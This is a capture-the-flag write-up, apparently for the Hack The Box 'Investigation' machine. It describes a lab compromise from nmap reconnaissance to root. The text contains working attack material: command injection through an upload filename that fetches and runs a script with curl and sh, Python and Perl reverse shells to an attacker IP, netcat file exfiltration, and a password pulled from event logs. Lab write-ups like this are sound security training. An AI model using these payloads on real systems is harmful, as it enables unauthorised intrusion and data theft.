Investigation

Nmap tells us that there's two ports open:

nmap -sC -sV -oA nmap/ -T4 10.129.138.100
# Nmap 7.93 scan initiated Sun Jan 22 11:12:19 2023 as: /snap/nmap/2864/usr/bin/nmap -sC -sV -oA nmap/ -T4 10.129.53.197
Nmap scan report for 10.129.53.197
Host is up (0.076s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 2f1e6306aa6ebbcc0d19d4152674c6d9 (RSA)
|   256 274520add2faa73a8373d97c79abf30b (ECDSA)
|_  256 4245eb916e21020617b2748bc5834fe0 (ED25519)
80/tcp open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://eforenzics.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: eforenzics.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 22 11:12:29 2023 -- 1 IP address (1 host up) scanned in 9.63 seconds

There seems to be a domain attached to the ip, let's add it to to our /etc/hosts:

etchosts

The website seems to be built on PHP. There's a file upload thing on /upload.php

web-page

After the upload the page gives us a link to the forensics result:

exiftool

The "forensics" seems to be just exiftool output. Exiftool is a command line program so chances are the app also uses direct linux commands to generate the result. Let's play with the file upload a bit. Upload some jpeg image on the form again, but this time intercept the request with Burpsuite

initial-rce

Here we simply edited the filename of the image to include sleep, and the request actually takes 5 seconds to execute! Next, let's get a reverse shell. Note: there is some sort of black characters (atleast |) so the next command mayb look a bit uncommon.

First. Let's create a folder www and host a file index.html there. Contents of the index.html are like:

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.40",9001));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Next, navigate to the www-folder and start python web server:

python3 -m http.server

Before executing our script on fileupload, start a netcat listener on port 9001:

nc -lnvp 9001

Next, upload another file and intercept it with Burp, before sending it change to filename to the following:

curl 10.10.14.40:8000 --output test && sh test && sleep 10  |

Basically, it downloads the contents of our index.html file and executes it with sh. After sending the request we get a shell as www-data!

On the server there seems to be another user called smorton. We have no access to his home-directory. After enumerating a bit we can see that there's another folder which belongs to smorton and we can access:

find / -group smorton 2>/dev/null

/home/smorton

/usr/local/investigation/Windows Event Logs for Analysis.msg

Let's send the file to our local machine by using netcat: on the local machine run:

nc -l -p 1234 -q 1 > message.msg < /dev/null

And on server run:

cat '/usr/local/investigation/Windows Event Logs for Analysis.msg

' | nc 10.10.14.40 1234

After downloading the file let's analyze it. file tells us that it's a Microsoft outlook message file:

joonas@joonas-VirtualBox:~/Documents/htb/investigation$ file message.msg 

message.msg: CDFV2 Microsoft Outlook Message

We can convert the file into readable format by running msgconvert:

msgconvert message.msg

This generated message.eml file which contains emails in text format:

email

Interesting, there's some talks about logs, rest of the text seems to be on base64-format. After decoding (You can use CyberChef or base64 -command line utility for that the file is long so I will not show it here) we seem to be dealing with a zip file, after unzipping that we get a file called security.evtx. Running file on that tells us that it's a Windows log file (no surprices here)

file security.evtx 
security.evtx: MS Windows Vista Event Log, 238 chunks (no. 237 in use), next record no. 20013

We can use evtx_dump.py to convert the file into xml (You can also send it to Windows VM and analyze it there)

evtx_dump.py security.evtx > security.xml

Now we have access to the log file!

The next step can be a bit tedious. My reasoning here was that maybe someone accidently typed password on the username field and the Windows event logs saved the password on the log? Far fetched? Maybe, But it worked! Running

cat security.xml |grep TargetUserName |grep -v "Jenkins\|EFORENZICS\|SYSTEM\|ljenkins\|Administrators\|SMorton\|AAnderson"

On the log file shows us that there is some kind of password!

.....
<Data Name="TargetUserName">Def@ultf0r3nz!csPa$$</Data> 
.....

Luckily, this password is also valid for user smorton on ssh!

Running sudo -l on smorton reveals us that we can run a binary as root:

smorton@investigation:~$ sudo -l

Matching Defaults entries for smorton on investigation:

    env_reset, mail_badpass,

    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User smorton may run the following commands on investigation:

    (root) NOPASSWD: /usr/bin/binary

smorton@investigation:~$ 

Let's download the binary to our local machine and analyze it on Ghidra.

ghidra-snippet

Ghidra actually does a pretty good job on displaying the c-code. The app requires 3 params (binary-name included) and last param must be 'lDnxUysaQn'. Then it takes the output of the second param, uses that as an url on curl-command, runs the output with perl and cleans up after that. In other words, it downloads and executes a perl-script. Let's setup a perl reverse shell on our local machine:

use Socket;$i="10.10.14.40";$p=9001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};

And once again, setup netcat listener:

nc -lnvp 9001

And finally, run the binary:

sudo /usr/bin/binary http://10.10.14.40:8000/shell.pl lDnxUysaQn

Running... 

And our netcat listener should have a root shell:

joonas@joonas-VirtualBox:~/Documents/htb/investigation$ nc -lnvp 9001

Listening on 0.0.0.0 9001

Connection received on 10.129.138.100 35924

# whoami

root

# 

GG